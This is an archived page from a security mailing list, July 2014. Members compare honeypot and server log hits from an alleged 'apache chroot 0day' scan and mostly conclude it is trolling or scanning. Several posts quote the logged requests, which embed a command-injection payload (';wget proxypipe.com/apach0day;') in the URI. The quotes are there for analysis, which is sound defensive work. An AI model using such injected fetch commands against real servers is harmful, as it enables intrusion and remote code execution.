Home page logo
/
pauldotcom logo
PaulDotCom Mailing List

General discussion of security news, research, vulnerabilities, and the PaulDotCom Security Weekly podcast.

List Archives

Jan–MarApr–JunJul–SepOct–Dec
2014821063
2013283349100161
2012253255294288
2011433403313168
20101040730620463
20097136151233889
2008548

Latest Posts

Re: [Security Weekly] Bad c# encryption class Robin Wood (Jul 30)
I got one in the end. I was creating an app in DotNet that I wanted someone
to decompile then find an extract the encryption/decryption class so they
could use it to interact with the system.

Can't remember where I found it but got a nice, self contained, class that
was to complex to easily analyse but was easy to just build into my app.

Robin

Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 29)
Here is the ISC diary on the hits, doesn't add anything new at the moment
but keep an eye on the comments just in case.

https://isc.sans.edu/forums/diary/Interesting+HTTP+User+Agent+chroot-apach0day/18453

Robin

Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 29)
This looks to me like an attempt to troll the Internet into thinking
someone has an EPIC botnet based on an Apache 0 day. All I saw in the
one packet capture I got was a plain request with a suspicious URI, UA
and referrer. No obvious payload or anything else interesting. Reminds
me of the whole GET /w00tw00t.at.ISC.SANS.DFind:) thing.

Jim

Re: [Security Weekly] apache chroot 0day? Bruno Savioli (Jul 29)
I got the same on 7 different servers.
Plus, I also had this, from the same IP on 25/06 on 3 of my servers:

GET /rutorrent HTTP/1.0 User-Agent: Chrome 14.2.0 Mozilla (Gecko)Accept: */*

Bruno

Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 29)
Am 28.07.2014 21:26, schrieb Lutz Schildt:

Another one:

GET /?x0a/x04/x0a/x02/x06/x08/x09/cDDOSSdns-STAGE2;wget
proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day-HIDDEN BINDSHELL-ESTAB
Referrer: /xA/x0a/x06HIDDENSHELL--ESTABLISHED

Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 29)
are scanning the internet (I own the site in question, proxypipe.com )

Re: [Security Weekly] apache chroot 0day? Robin Wood (Jul 29)
I was hit this morning about 635 GMT+1 from 162.253.66.77

My site is just a simple honeypot type site, nothing special just logs hits.

Robin

Re: [Security Weekly] apache chroot 0day? Oleg Laskin (Jul 29)
Would this be a reverse honeypot ? :)

I just got a hit also on my sensor:

162.253.66.77 - - [28/Jul/2014:17:54:00 +0000] "GET
/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget%20proxypipe.com/apach0day;
HTTP/1.0" 200 8687 "-" "chroot-apach0day"

Oleg.

Re: [Security Weekly] apache chroot 0day? Lutz Schildt (Jul 29)
I've seen the same request on one of my honeypots and a second one a few hours later from the same IP:

GET/?x0a/x04/x0a/x02/x06/x08/x09/cDDOSpart3dns;wget proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day
Referrer: /xA/x0a/x06

Re: [Security Weekly] apache chroot 0day? Ken Pryor (Jul 29)
I host three sites on Digital Ocean. Just checked my Apache logs and I got
hits from this too.

Ken Pryor

Re: [Security Weekly] apache chroot 0day? Eric Buckingham (Jul 28)
Looks like an attempt by somebody to troll us sadly :/

Re: [Security Weekly] apache chroot 0day? Jim Halfpenny (Jul 28)
It didn't take long to get a pcap of this request, I started httpd on
a random VPS of mine and it's the only request I have received so far.
At first glance it doesn't seem like anything special.

Jim

Re: [Security Weekly] apache chroot 0day? Ben Jackson (Jul 28)
Nice find Robin! This hit each and everyone one of my honeypots. Same
request. Really weird.

Here is what TShark shows me off one of my pcaps:

----
Node 0: 162.253.66.77:41790
Node 1: LOLHONEYPOT:80
139
GET /?x0a/x04/x0a/x04/x06/x08/x09/cDDOSv2dns;wget%20proxypipe.com/apach0day;
HTTP/1.0
User-agent: chroot-apach0day
Referrer: /xA/x0a/x05

300
HTTP/1.1 200 OK
Date: Mon, 28 Jul 2014 05:38:48 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Wed,...

Re: [Security Weekly] apache chroot 0day? xgermx (Jul 28)
Seeing hits from 16X.XXX.XX.X7
Based on the name, I'd have to guess reflective DNS DDoS
Registrant phone for proxypipe.com is +1.8557769900 which actually works
and an IVR picks up :) I selected option 2 for tech support to complain
that the other kidz are laughing at my lame apache 0day but, my call was
shunted.

xgermx

Re: [Security Weekly] apache chroot 0day? Xavier Mertens (Jul 28)
+1
One site was scanned at 07:55 (GMT+1)
The site was a mailman front-end. And yours?

/x

More Lists

Dozens of other network security lists are archived at SecLists.Org.


[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]